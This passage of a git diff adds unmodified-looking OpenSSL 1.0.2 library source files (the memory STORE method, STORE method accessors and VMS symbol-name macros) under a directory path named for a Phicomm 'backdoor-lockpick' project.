+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include <openssl/err.h>
+#include "str_locl.h"
+
+/*
+ * The memory store is currently highly experimental.  It's meant to become a
+ * base store used by other stores for internal caching (for full caching
+ * support, aging needs to be added).
+ *
+ * The database use is meant to support as much attribute association as
+ * possible, while providing for as small search ranges as possible. This is
+ * currently provided for by sorting the entries by numbers that are composed
+ * of bits set at the positions indicated by attribute type codes.  This
+ * provides for ranges determined by the highest attribute type code value.
+ * A better idea might be to sort by values computed from the range of
+ * attributes associated with the object (basically, the difference between
+ * the highest and lowest attribute type code) and it's distance from a base
+ * (basically, the lowest associated attribute type code).
+ */
+
+typedef struct mem_object_data_st {
+    STORE_OBJECT *object;
+    STORE_ATTR_INFO *attr_info;
+    int references;
+} MEM_OBJECT_DATA;
+
+DECLARE_STACK_OF(MEM_OBJECT_DATA)
+struct mem_data_st {
+    /*
+     * sorted with
+     * STORE_ATTR_INFO_compare().
+     */
+    STACK_OF(MEM_OBJECT_DATA) *data;
+    /*
+     * Currently unused, but can
+     * be used to add attributes
+     * from parts of the data.
+     */
+    unsigned int compute_components:1;
+};
+
+DECLARE_STACK_OF(STORE_ATTR_INFO)
+struct mem_ctx_st {
+    /* The type we're searching for */
+    int type;
+    /*
+     * Sets of
+     * attributes to search for.  Each
+     * element is a STORE_ATTR_INFO.
+     */
+    STACK_OF(STORE_ATTR_INFO) *search_attributes;
+    /*
+     * which of the search attributes we
+     * found a match for, -1 when we still
+     * haven't found any
+     */
+    int search_index;
+    /* -1 as long as we're searching for the first */
+    int index;
+};
+
+static int mem_init(STORE *s);
+static void mem_clean(STORE *s);
+static STORE_OBJECT *mem_generate(STORE *s, STORE_OBJECT_TYPES type,
+                                  OPENSSL_ITEM attributes[],
+                                  OPENSSL_ITEM parameters[]);
+static STORE_OBJECT *mem_get(STORE *s, STORE_OBJECT_TYPES type,
+                             OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[]);
+static int mem_store(STORE *s, STORE_OBJECT_TYPES type, STORE_OBJECT *data,
+                     OPENSSL_ITEM attributes[], OPENSSL_ITEM parameters[]);
+static int mem_modify(STORE *s, STORE_OBJECT_TYPES type,
+                      OPENSSL_ITEM search_attributes[],
+                      OPENSSL_ITEM add_attributes[],
+                      OPENSSL_ITEM modify_attributes[],
+                      OPENSSL_ITEM delete_attributes[],
+                      OPENSSL_ITEM parameters[]);
+static int mem_delete(STORE *s, STORE_OBJECT_TYPES type,
+                      OPENSSL_ITEM attributes[], OPENSSL_ITEM parameters[]);
+static void *mem_list_start(STORE *s, STORE_OBJECT_TYPES type,
+                            OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[]);
+static STORE_OBJECT *mem_list_next(STORE *s, void *handle);
+static int mem_list_end(STORE *s, void *handle);
+static int mem_list_endp(STORE *s, void *handle);
+static int mem_lock(STORE *s, OPENSSL_ITEM attributes[],
+                    OPENSSL_ITEM parameters[]);
+static int mem_unlock(STORE *s, OPENSSL_ITEM attributes[],
+                      OPENSSL_ITEM parameters[]);
+static int mem_ctrl(STORE *s, int cmd, long l, void *p, void (*f) (void));
+
+static STORE_METHOD store_memory = {
+    "OpenSSL memory store interface",
+    mem_init,
+    mem_clean,
+    mem_generate,
+    mem_get,
+    mem_store,
+    mem_modify,
+    NULL,                       /* revoke */
+    mem_delete,
+    mem_list_start,
+    mem_list_next,
+    mem_list_end,
+    mem_list_endp,
+    NULL,                       /* update */
+    mem_lock,
+    mem_unlock,
+    mem_ctrl
+};
+
+const STORE_METHOD *STORE_Memory(void)
+{
+    return &store_memory;
+}
+
+static int mem_init(STORE *s)
+{
+    return 1;
+}
+
+static void mem_clean(STORE *s)
+{
+    return;
+}
+
+static STORE_OBJECT *mem_generate(STORE *s, STORE_OBJECT_TYPES type,
+                                  OPENSSL_ITEM attributes[],
+                                  OPENSSL_ITEM parameters[])
+{
+    STOREerr(STORE_F_MEM_GENERATE, STORE_R_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static STORE_OBJECT *mem_get(STORE *s, STORE_OBJECT_TYPES type,
+                             OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    void *context = mem_list_start(s, type, attributes, parameters);
+
+    if (context) {
+        STORE_OBJECT *object = mem_list_next(s, context);
+
+        if (mem_list_end(s, context))
+            return object;
+    }
+    return NULL;
+}
+
+static int mem_store(STORE *s, STORE_OBJECT_TYPES type,
+                     STORE_OBJECT *data, OPENSSL_ITEM attributes[],
+                     OPENSSL_ITEM parameters[])
+{
+    STOREerr(STORE_F_MEM_STORE, STORE_R_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static int mem_modify(STORE *s, STORE_OBJECT_TYPES type,
+                      OPENSSL_ITEM search_attributes[],
+                      OPENSSL_ITEM add_attributes[],
+                      OPENSSL_ITEM modify_attributes[],
+                      OPENSSL_ITEM delete_attributes[],
+                      OPENSSL_ITEM parameters[])
+{
+    STOREerr(STORE_F_MEM_MODIFY, STORE_R_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static int mem_delete(STORE *s, STORE_OBJECT_TYPES type,
+                      OPENSSL_ITEM attributes[], OPENSSL_ITEM parameters[])
+{
+    STOREerr(STORE_F_MEM_DELETE, STORE_R_NOT_IMPLEMENTED);
+    return 0;
+}
+
+/*
+ * The list functions may be the hardest to understand.  Basically,
+ * mem_list_start compiles a stack of attribute info elements, and puts that
+ * stack into the context to be returned.  mem_list_next will then find the
+ * first matching element in the store, and then walk all the way to the end
+ * of the store (since any combination of attribute bits above the starting
+ * point may match the searched for bit pattern...).
+ */
+static void *mem_list_start(STORE *s, STORE_OBJECT_TYPES type,
+                            OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[])
+{
+    struct mem_ctx_st *context =
+        (struct mem_ctx_st *)OPENSSL_malloc(sizeof(struct mem_ctx_st));
+    void *attribute_context = NULL;
+    STORE_ATTR_INFO *attrs = NULL;
+
+    if (!context) {
+        STOREerr(STORE_F_MEM_LIST_START, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    memset(context, 0, sizeof(struct mem_ctx_st));
+
+    attribute_context = STORE_parse_attrs_start(attributes);
+    if (!attribute_context) {
+        STOREerr(STORE_F_MEM_LIST_START, ERR_R_STORE_LIB);
+        goto err;
+    }
+
+    while ((attrs = STORE_parse_attrs_next(attribute_context))) {
+        if (context->search_attributes == NULL) {
+            context->search_attributes =
+                sk_STORE_ATTR_INFO_new(STORE_ATTR_INFO_compare);
+            if (!context->search_attributes) {
+                STOREerr(STORE_F_MEM_LIST_START, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+        }
+        sk_STORE_ATTR_INFO_push(context->search_attributes, attrs);
+    }
+    if (!STORE_parse_attrs_endp(attribute_context))
+        goto err;
+    STORE_parse_attrs_end(attribute_context);
+    context->search_index = -1;
+    context->index = -1;
+    return context;
+ err:
+    if (attribute_context)
+        STORE_parse_attrs_end(attribute_context);
+    mem_list_end(s, context);
+    return NULL;
+}
+
+static STORE_OBJECT *mem_list_next(STORE *s, void *handle)
+{
+    int i;
+    struct mem_ctx_st *context = (struct mem_ctx_st *)handle;
+    struct mem_object_data_st key = { 0, 0, 1 };
+    struct mem_data_st *store = (struct mem_data_st *)STORE_get_ex_data(s, 1);
+    int srch;
+    int cres = 0;
+
+    if (!context) {
+        STOREerr(STORE_F_MEM_LIST_NEXT, ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+    if (!store) {
+        STOREerr(STORE_F_MEM_LIST_NEXT, STORE_R_NO_STORE);
+        return NULL;
+    }
+
+    if (context->search_index == -1) {
+        for (i = 0;
+             i < sk_STORE_ATTR_INFO_num(context->search_attributes); i++) {
+            key.attr_info
+                = sk_STORE_ATTR_INFO_value(context->search_attributes, i);
+            srch = sk_MEM_OBJECT_DATA_find_ex(store->data, &key);
+
+            if (srch >= 0) {
+                context->search_index = srch;
+                break;
+            }
+        }
+    }
+    if (context->search_index < 0)
+        return NULL;
+
+    key.attr_info =
+        sk_STORE_ATTR_INFO_value(context->search_attributes,
+                                 context->search_index);
+    for (srch = context->search_index;
+         srch < sk_MEM_OBJECT_DATA_num(store->data)
+         && STORE_ATTR_INFO_in_range(key.attr_info,
+                                     sk_MEM_OBJECT_DATA_value(store->data,
+                                                              srch)->attr_info)
+         && !(cres =
+              STORE_ATTR_INFO_in_ex(key.attr_info,
+                                    sk_MEM_OBJECT_DATA_value(store->data,
+                                                             srch)->attr_info));
+         srch++) ;
+
+    context->search_index = srch;
+    if (cres)
+        return (sk_MEM_OBJECT_DATA_value(store->data, srch))->object;
+    return NULL;
+}
+
+static int mem_list_end(STORE *s, void *handle)
+{
+    struct mem_ctx_st *context = (struct mem_ctx_st *)handle;
+
+    if (!context) {
+        STOREerr(STORE_F_MEM_LIST_END, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (context && context->search_attributes)
+        sk_STORE_ATTR_INFO_free(context->search_attributes);
+    if (context)
+        OPENSSL_free(context);
+    return 1;
+}
+
+static int mem_list_endp(STORE *s, void *handle)
+{
+    struct mem_ctx_st *context = (struct mem_ctx_st *)handle;
+
+    if (!context
+        || context->search_index
+        == sk_STORE_ATTR_INFO_num(context->search_attributes))
+        return 1;
+    return 0;
+}
+
+static int mem_lock(STORE *s, OPENSSL_ITEM attributes[],
+                    OPENSSL_ITEM parameters[])
+{
+    return 1;
+}
+
+static int mem_unlock(STORE *s, OPENSSL_ITEM attributes[],
+                      OPENSSL_ITEM parameters[])
+{
+    return 1;
+}
+
+static int mem_ctrl(STORE *s, int cmd, long l, void *p, void (*f) (void))
+{
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_meth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_meth.c
new file mode 100644
index 0000000..d83a6de
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_meth.c
@@ -0,0 +1,280 @@
+/* crypto/store/str_meth.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2003.
+ */
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include <openssl/buffer.h>
+#include "str_locl.h"
+
+STORE_METHOD *STORE_create_method(char *name)
+{
+    STORE_METHOD *store_method =
+        (STORE_METHOD *)OPENSSL_malloc(sizeof(STORE_METHOD));
+
+    if (store_method) {
+        memset(store_method, 0, sizeof(*store_method));
+        store_method->name = BUF_strdup(name);
+    }
+    return store_method;
+}
+
+/*
+ * BIG FSCKING WARNING!!!! If you use this on a statically allocated method
+ * (that is, it hasn't been allocated using STORE_create_method(), you
+ * deserve anything Murphy can throw at you and more! You have been warned.
+ */
+void STORE_destroy_method(STORE_METHOD *store_method)
+{
+    if (!store_method)
+        return;
+    OPENSSL_free(store_method->name);
+    store_method->name = NULL;
+    OPENSSL_free(store_method);
+}
+
+int STORE_method_set_initialise_function(STORE_METHOD *sm,
+                                         STORE_INITIALISE_FUNC_PTR init_f)
+{
+    sm->init = init_f;
+    return 1;
+}
+
+int STORE_method_set_cleanup_function(STORE_METHOD *sm,
+                                      STORE_CLEANUP_FUNC_PTR clean_f)
+{
+    sm->clean = clean_f;
+    return 1;
+}
+
+int STORE_method_set_generate_function(STORE_METHOD *sm,
+                                       STORE_GENERATE_OBJECT_FUNC_PTR
+                                       generate_f)
+{
+    sm->generate_object = generate_f;
+    return 1;
+}
+
+int STORE_method_set_get_function(STORE_METHOD *sm,
+                                  STORE_GET_OBJECT_FUNC_PTR get_f)
+{
+    sm->get_object = get_f;
+    return 1;
+}
+
+int STORE_method_set_store_function(STORE_METHOD *sm,
+                                    STORE_STORE_OBJECT_FUNC_PTR store_f)
+{
+    sm->store_object = store_f;
+    return 1;
+}
+
+int STORE_method_set_modify_function(STORE_METHOD *sm,
+                                     STORE_MODIFY_OBJECT_FUNC_PTR modify_f)
+{
+    sm->modify_object = modify_f;
+    return 1;
+}
+
+int STORE_method_set_revoke_function(STORE_METHOD *sm,
+                                     STORE_HANDLE_OBJECT_FUNC_PTR revoke_f)
+{
+    sm->revoke_object = revoke_f;
+    return 1;
+}
+
+int STORE_method_set_delete_function(STORE_METHOD *sm,
+                                     STORE_HANDLE_OBJECT_FUNC_PTR delete_f)
+{
+    sm->delete_object = delete_f;
+    return 1;
+}
+
+int STORE_method_set_list_start_function(STORE_METHOD *sm,
+                                         STORE_START_OBJECT_FUNC_PTR
+                                         list_start_f)
+{
+    sm->list_object_start = list_start_f;
+    return 1;
+}
+
+int STORE_method_set_list_next_function(STORE_METHOD *sm,
+                                        STORE_NEXT_OBJECT_FUNC_PTR
+                                        list_next_f)
+{
+    sm->list_object_next = list_next_f;
+    return 1;
+}
+
+int STORE_method_set_list_end_function(STORE_METHOD *sm,
+                                       STORE_END_OBJECT_FUNC_PTR list_end_f)
+{
+    sm->list_object_end = list_end_f;
+    return 1;
+}
+
+int STORE_method_set_update_store_function(STORE_METHOD *sm,
+                                           STORE_GENERIC_FUNC_PTR update_f)
+{
+    sm->update_store = update_f;
+    return 1;
+}
+
+int STORE_method_set_lock_store_function(STORE_METHOD *sm,
+                                         STORE_GENERIC_FUNC_PTR lock_f)
+{
+    sm->lock_store = lock_f;
+    return 1;
+}
+
+int STORE_method_set_unlock_store_function(STORE_METHOD *sm,
+                                           STORE_GENERIC_FUNC_PTR unlock_f)
+{
+    sm->unlock_store = unlock_f;
+    return 1;
+}
+
+int STORE_method_set_ctrl_function(STORE_METHOD *sm,
+                                   STORE_CTRL_FUNC_PTR ctrl_f)
+{
+    sm->ctrl = ctrl_f;
+    return 1;
+}
+
+STORE_INITIALISE_FUNC_PTR STORE_method_get_initialise_function(STORE_METHOD
+                                                               *sm)
+{
+    return sm->init;
+}
+
+STORE_CLEANUP_FUNC_PTR STORE_method_get_cleanup_function(STORE_METHOD *sm)
+{
+    return sm->clean;
+}
+
+STORE_GENERATE_OBJECT_FUNC_PTR STORE_method_get_generate_function(STORE_METHOD
+                                                                  *sm)
+{
+    return sm->generate_object;
+}
+
+STORE_GET_OBJECT_FUNC_PTR STORE_method_get_get_function(STORE_METHOD *sm)
+{
+    return sm->get_object;
+}
+
+STORE_STORE_OBJECT_FUNC_PTR STORE_method_get_store_function(STORE_METHOD *sm)
+{
+    return sm->store_object;
+}
+
+STORE_MODIFY_OBJECT_FUNC_PTR STORE_method_get_modify_function(STORE_METHOD
+                                                              *sm)
+{
+    return sm->modify_object;
+}
+
+STORE_HANDLE_OBJECT_FUNC_PTR STORE_method_get_revoke_function(STORE_METHOD
+                                                              *sm)
+{
+    return sm->revoke_object;
+}
+
+STORE_HANDLE_OBJECT_FUNC_PTR STORE_method_get_delete_function(STORE_METHOD
+                                                              *sm)
+{
+    return sm->delete_object;
+}
+
+STORE_START_OBJECT_FUNC_PTR STORE_method_get_list_start_function(STORE_METHOD
+                                                                 *sm)
+{
+    return sm->list_object_start;
+}
+
+STORE_NEXT_OBJECT_FUNC_PTR STORE_method_get_list_next_function(STORE_METHOD
+                                                               *sm)
+{
+    return sm->list_object_next;
+}
+
+STORE_END_OBJECT_FUNC_PTR STORE_method_get_list_end_function(STORE_METHOD *sm)
+{
+    return sm->list_object_end;
+}
+
+STORE_GENERIC_FUNC_PTR STORE_method_get_update_store_function(STORE_METHOD
+                                                              *sm)
+{
+    return sm->update_store;
+}
+
+STORE_GENERIC_FUNC_PTR STORE_method_get_lock_store_function(STORE_METHOD *sm)
+{
+    return sm->lock_store;
+}
+
+STORE_GENERIC_FUNC_PTR STORE_method_get_unlock_store_function(STORE_METHOD
+                                                              *sm)
+{
+    return sm->unlock_store;
+}
+
+STORE_CTRL_FUNC_PTR STORE_method_get_ctrl_function(STORE_METHOD *sm)
+{
+    return sm->ctrl;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/symhacks.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/symhacks.h
new file mode 100644
index 0000000..239fa4f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/symhacks.h
@@ -0,0 +1,516 @@
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_SYMHACKS_H
+# define HEADER_SYMHACKS_H
+
+# include <openssl/e_os2.h>
+
+/*
+ * Hacks to solve the problem with linkers incapable of handling very long
+ * symbol names.  In the case of VMS, the limit is 31 characters on VMS for
+ * VAX.
+ */
+/*
+ * Note that this affects util/libeay.num and util/ssleay.num...  you may
+ * change those manually, but that's not recommended, as those files are
+ * controlled centrally and updated on Unix, and the central definition may
+ * disagree with yours, which in turn may come with shareable library
+ * incompatibilities.
+ */
+# ifdef OPENSSL_SYS_VMS
+
+/* Hack a long name in crypto/ex_data.c */
+#  undef CRYPTO_get_ex_data_implementation
+#  define CRYPTO_get_ex_data_implementation       CRYPTO_get_ex_data_impl
+#  undef CRYPTO_set_ex_data_implementation
+#  define CRYPTO_set_ex_data_implementation       CRYPTO_set_ex_data_impl
+
+/* Hack a long name in crypto/asn1/a_mbstr.c */
+#  undef ASN1_STRING_set_default_mask_asc
+#  define ASN1_STRING_set_default_mask_asc        ASN1_STRING_set_def_mask_asc
+
+#  if 0                         /* No longer needed, since safestack macro
+                                 * magic does the job */
+/* Hack the names created with DECLARE_ASN1_SET_OF(PKCS7_SIGNER_INFO) */
+#   undef i2d_ASN1_SET_OF_PKCS7_SIGNER_INFO
+#   define i2d_ASN1_SET_OF_PKCS7_SIGNER_INFO       i2d_ASN1_SET_OF_PKCS7_SIGINF
+#   undef d2i_ASN1_SET_OF_PKCS7_SIGNER_INFO
+#   define d2i_ASN1_SET_OF_PKCS7_SIGNER_INFO       d2i_ASN1_SET_OF_PKCS7_SIGINF
+#  endif
+
+#  if 0                         /* No longer needed, since safestack macro
+                                 * magic does the job */
+/* Hack the names created with DECLARE_ASN1_SET_OF(PKCS7_RECIP_INFO) */
+#   undef i2d_ASN1_SET_OF_PKCS7_RECIP_INFO
+#   define i2d_ASN1_SET_OF_PKCS7_RECIP_INFO        i2d_ASN1_SET_OF_PKCS7_RECINF
+#   undef d2i_ASN1_SET_OF_PKCS7_RECIP_INFO
+#   define d2i_ASN1_SET_OF_PKCS7_RECIP_INFO        d2i_ASN1_SET_OF_PKCS7_RECINF
+#  endif
+
+#  if 0                         /* No longer needed, since safestack macro
+                                 * magic does the job */
+/* Hack the names created with DECLARE_ASN1_SET_OF(ACCESS_DESCRIPTION) */
+#   undef i2d_ASN1_SET_OF_ACCESS_DESCRIPTION
+#   define i2d_ASN1_SET_OF_ACCESS_DESCRIPTION      i2d_ASN1_SET_OF_ACC_DESC
+#   undef d2i_ASN1_SET_OF_ACCESS_DESCRIPTION
+#   define d2i_ASN1_SET_OF_ACCESS_DESCRIPTION      d2i_ASN1_SET_OF_ACC_DESC
+#  endif
+
+/* Hack the names created with DECLARE_PEM_rw(NETSCAPE_CERT_SEQUENCE) */
+#  undef PEM_read_NETSCAPE_CERT_SEQUENCE
+#  define PEM_read_NETSCAPE_CERT_SEQUENCE         PEM_read_NS_CERT_SEQ
+#  undef PEM_write_NETSCAPE_CERT_SEQUENCE
+#  define PEM_write_NETSCAPE_CERT_SEQUENCE        PEM_write_NS_CERT_SEQ
+#  undef PEM_read_bio_NETSCAPE_CERT_SEQUENCE
+#  define PEM_read_bio_NETSCAPE_CERT_SEQUENCE     PEM_read_bio_NS_CERT_SEQ
+#  undef PEM_write_bio_NETSCAPE_CERT_SEQUENCE
+#  define PEM_write_bio_NETSCAPE_CERT_SEQUENCE    PEM_write_bio_NS_CERT_SEQ
+#  undef PEM_write_cb_bio_NETSCAPE_CERT_SEQUENCE
+#  define PEM_write_cb_bio_NETSCAPE_CERT_SEQUENCE PEM_write_cb_bio_NS_CERT_SEQ
+
+/* Hack the names created with DECLARE_PEM_rw(PKCS8_PRIV_KEY_INFO) */
+#  undef PEM_read_PKCS8_PRIV_KEY_INFO
+#  define PEM_read_PKCS8_PRIV_KEY_INFO            PEM_read_P8_PRIV_KEY_INFO
+#  undef PEM_write_PKCS8_PRIV_KEY_INFO
+#  define PEM_write_PKCS8_PRIV_KEY_INFO           PEM_write_P8_PRIV_KEY_INFO
+#  undef PEM_read_bio_PKCS8_PRIV_KEY_INFO
+#  define PEM_read_bio_PKCS8_PRIV_KEY_INFO        PEM_read_bio_P8_PRIV_KEY_INFO
+#  undef PEM_write_bio_PKCS8_PRIV_KEY_INFO
+#  define PEM_write_bio_PKCS8_PRIV_KEY_INFO       PEM_write_bio_P8_PRIV_KEY_INFO
+#  undef PEM_write_cb_bio_PKCS8_PRIV_KEY_INFO
+#  define PEM_write_cb_bio_PKCS8_PRIV_KEY_INFO    PEM_wrt_cb_bio_P8_PRIV_KEY_INFO
+
+/* Hack other PEM names */
+#  undef PEM_write_bio_PKCS8PrivateKey_nid
+#  define PEM_write_bio_PKCS8PrivateKey_nid       PEM_write_bio_PKCS8PrivKey_nid
+
+/* Hack some long X509 names */
+#  undef X509_REVOKED_get_ext_by_critical
+#  define X509_REVOKED_get_ext_by_critical        X509_REVOKED_get_ext_by_critic
+#  undef X509_policy_tree_get0_user_policies
+#  define X509_policy_tree_get0_user_policies     X509_pcy_tree_get0_usr_policies
+#  undef X509_policy_node_get0_qualifiers
+#  define X509_policy_node_get0_qualifiers        X509_pcy_node_get0_qualifiers
+#  undef X509_STORE_CTX_get_explicit_policy
+#  define X509_STORE_CTX_get_explicit_policy      X509_STORE_CTX_get_expl_policy
+#  undef X509_STORE_CTX_get0_current_issuer
+#  define X509_STORE_CTX_get0_current_issuer      X509_STORE_CTX_get0_cur_issuer
+
+/* Hack some long CRYPTO names */
+#  undef CRYPTO_set_dynlock_destroy_callback
+#  define CRYPTO_set_dynlock_destroy_callback     CRYPTO_set_dynlock_destroy_cb
+#  undef CRYPTO_set_dynlock_create_callback
+#  define CRYPTO_set_dynlock_create_callback      CRYPTO_set_dynlock_create_cb
+#  undef CRYPTO_set_dynlock_lock_callback
+#  define CRYPTO_set_dynlock_lock_callback        CRYPTO_set_dynlock_lock_cb
+#  undef CRYPTO_get_dynlock_lock_callback
+#  define CRYPTO_get_dynlock_lock_callback        CRYPTO_get_dynlock_lock_cb
+#  undef CRYPTO_get_dynlock_destroy_callback
